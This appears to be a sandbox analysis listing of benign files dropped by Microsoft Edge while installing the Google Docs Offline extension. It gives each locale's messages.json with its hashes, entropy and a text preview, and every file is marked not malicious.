SHA-256:	36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
SHA-512:	C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\el\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	4.618182455684241
Encrypted:	false
SSDEEP:	24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
MD5:	9ABA4337C670C6349BA38FDDC27C2106
SHA1:	1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
SHA-256:	37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
SHA-512:	8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\en\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\en_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\en_GB\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	848
Entropy (8bit):	4.494568170878587
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
MD5:	3734D498FB377CF5E4E2508B8131C0FA
SHA1:	AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
SHA-256:	AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
SHA-512:	56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\en_US\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1425
Entropy (8bit):	4.461560329690825
Encrypted:	false
SSDEEP:	24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
MD5:	578215FBB8C12CB7E6CD73FBD16EC994
SHA1:	9471D71FA6D82CE1863B74E24237AD4FD9477187
SHA-256:	102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
SHA-512:	E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
Malicious:	false
Preview:	{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\es\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	961
Entropy (8bit):	4.537633413451255
Encrypted:	false
SSDEEP:	12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
MD5:	F61916A206AC0E971CDCB63B29E580E3
SHA1:	994B8C985DC1E161655D6E553146FB84D0030619
SHA-256:	2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
SHA-512:	D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\es_419\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	959
Entropy (8bit):	4.570019855018913
Encrypted:	false
SSDEEP:	24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
MD5:	535331F8FB98894877811B14994FEA9D
SHA1:	42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
SHA-256:	90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
SHA-512:	2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\et\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	968
Entropy (8bit):	4.633956349931516
Encrypted:	false
SSDEEP:	24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
MD5:	64204786E7A7C1ED9C241F1C59B81007
SHA1:	586528E87CD670249A44FB9C54B1796E40CDB794
SHA-256:	CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
SHA-512:	44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\eu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	838
Entropy (8bit):	4.4975520913636595
Encrypted:	false
SSDEEP:	24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
MD5:	29A1DA4ACB4C9D04F080BB101E204E93
SHA1:	2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
SHA-256:	A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
SHA-512:	B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
Malicious:	false
Preview:	{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\fa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1305
Entropy (8bit):	4.673517697192589
Encrypted:	false
SSDEEP:	24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
MD5:	097F3BA8DE41A0AAF436C783DCFE7EF3
SHA1:	986B8CABD794E08C7AD41F0F35C93E4824AC84DF
SHA-256:	7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
SHA-512:	8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\fi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	911
Entropy (8bit):	4.6294343834070935
Encrypted:	false
SSDEEP:	12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
MD5:	B38CBD6C2C5BFAA6EE252D573A0B12A1
SHA1:	2E490D5A4942D2455C3E751F96BD9960F93C4B60
SHA-256:	2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
SHA-512:	6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\fil\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	939
Entropy (8bit):	4.451724169062555
Encrypted:	false
SSDEEP:	24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
MD5:	FCEA43D62605860FFF41BE26BAD80169
SHA1:	F25C2CE893D65666CC46EA267E3D1AA080A25F5B
SHA-256:	F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
SHA-512:	F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\fr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.622066056638277
Encrypted:	false
SSDEEP:	24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
MD5:	A58C0EEBD5DC6BB5D91DAF923BD3A2AA
SHA1:	F169870EEED333363950D0BCD5A46D712231E2AE
SHA-256:	0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
SHA-512:	B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\fr_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	972
Entropy (8bit):	4.621319511196614
Encrypted:	false
SSDEEP:	24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
MD5:	6CAC04BDCC09034981B4AB567B00C296
SHA1:	84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
SHA-256:	4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
SHA-512:	160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\gl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	990
Entropy (8bit):	4.497202347098541
Encrypted:	false
SSDEEP:	12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
MD5:	6BAAFEE2F718BEFBC7CD58A04CCC6C92
SHA1:	CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
SHA-256:	0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
SHA-512:	3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\gu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1658
Entropy (8bit):	4.294833932445159
Encrypted:	false
SSDEEP:	24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
MD5:	BC7E1D09028B085B74CB4E04D8A90814
SHA1:	E28B2919F000B41B41209E56B7BF3A4448456CFE
SHA-256:	FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
SHA-512:	040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\hi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1672
Entropy (8bit):	4.314484457325167
Encrypted:	false
SSDEEP:	48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
MD5:	98A7FC3E2E05AFFFC1CFE4A029F47476
SHA1:	A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
SHA-256:	D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
SHA-512:	457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\hr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	935
Entropy (8bit):	4.6369398601609735
Encrypted:	false
SSDEEP:	24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
MD5:	25CDFF9D60C5FC4740A48EF9804BF5C7
SHA1:	4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
SHA-256:	73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
SHA-512:	EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
Malicious:	false
